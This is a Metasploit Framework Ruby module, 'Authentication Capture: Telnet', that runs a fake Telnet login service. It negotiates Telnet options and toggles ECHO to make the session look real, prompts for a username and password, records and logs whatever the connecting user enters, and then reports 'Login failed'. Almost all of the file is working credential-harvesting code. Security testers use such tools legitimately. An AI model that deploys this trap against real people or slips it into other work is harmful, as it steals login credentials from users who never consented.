metasploit-framework/modules/auxiliary/server/capture/telnet.rb

142 lines
2.9 KiB
Ruby

require 'msf/core'
# Fake Telnet Service - Kris Katterjohn 09/28/2008
class Metasploit3 < Msf::Auxiliary
include Exploit::Remote::TcpServer
include Auxiliary::Report
def initialize
super(
'Name' => 'Authentication Capture: Telnet',
'Version' => '$Revision$',
'Description' => %q{
This module provides a fake Telnet service that
is designed to capture authentication credentials. DONTs
and WONTs are sent to the client for all option negotiations,
except for ECHO at the time of the password prompt since
the server controls that for a bit more realism.
},
'Author' => 'Kris Katterjohn <katterjohn[at]gmail.com>',
'License' => MSF_LICENSE,
'Actions' => [ [ 'Capture' ] ],
'PassiveActions' => [ 'Capture' ],
'DefaultAction' => 'Capture'
)
register_options(
[
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 23 ])
], self.class)
end
def setup
super
@state = {}
end
def run
exploit()
end
def on_client_connect(c)
@state[c] = {
:name => "#{c.peerhost}:#{c.peerport}",
:ip => c.peerhost,
:port => c.peerport,
:user => nil,
:pass => nil,
:gotuser => false,
:gotpass => false,
:started => false
}
end
def on_client_data(c)
data = c.get_once
return if not data
offset = 0
if data[0] == 0xff
0.step(data.size, 3) do |x|
break if data[x] != 0xff
# Answer DONT/WONT for WILL/WONTs and DO/DONTs,
# except for echoing which we WILL control for
# the password
reply = "\xffX#{data[x + 2].chr}"
if @state[c][:pass] and data[x + 2] == 0x01
reply[1] = "\xfb"
elsif data[x + 1] == 0xfb or data[x + 1] == 0xfc
reply[1] = "\xfe"
elsif data[x + 1] == 0xfd or data[x + 1] == 0xfe
reply[1] = "\xfc"
end
c.put reply
offset += 3
end
end
if not @state[c][:started]
c.put "\r\nWelcome.\r\n\r\n"
@state[c][:started] = true
end
if @state[c][:user].nil?
c.put "\x01"
c.put "\x00Login: "
@state[c][:user] = ""
return
end
return if offset >= data.size
data = data[offset, data.size]
if not @state[c][:gotuser]
@state[c][:user] = data.strip
@state[c][:gotuser] = true
c.put "\xff\xfb\x01" # WILL ECHO
end
if @state[c][:pass].nil?
c.put "\x01"
c.put "\x00Password: "
@state[c][:pass] = ""
return
end
if not @state[c][:gotpass]
@state[c][:pass] = data.strip
@state[c][:gotpass] = true
c.put "\x00\r\n"
end
report_auth_info(
:host => @state[c][:ip],
:proto => 'telnet',
:targ_host => datastore['SRVHOST'],
:targ_port => datastore['SRVPORT'],
:user => @state[c][:user],
:pass => @state[c][:pass]
)
print_status("TELNET LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}")
c.put "\r\nLogin failed\r\n\r\n"
c.close
end
def on_client_close(c)
@state.delete(c)
end
end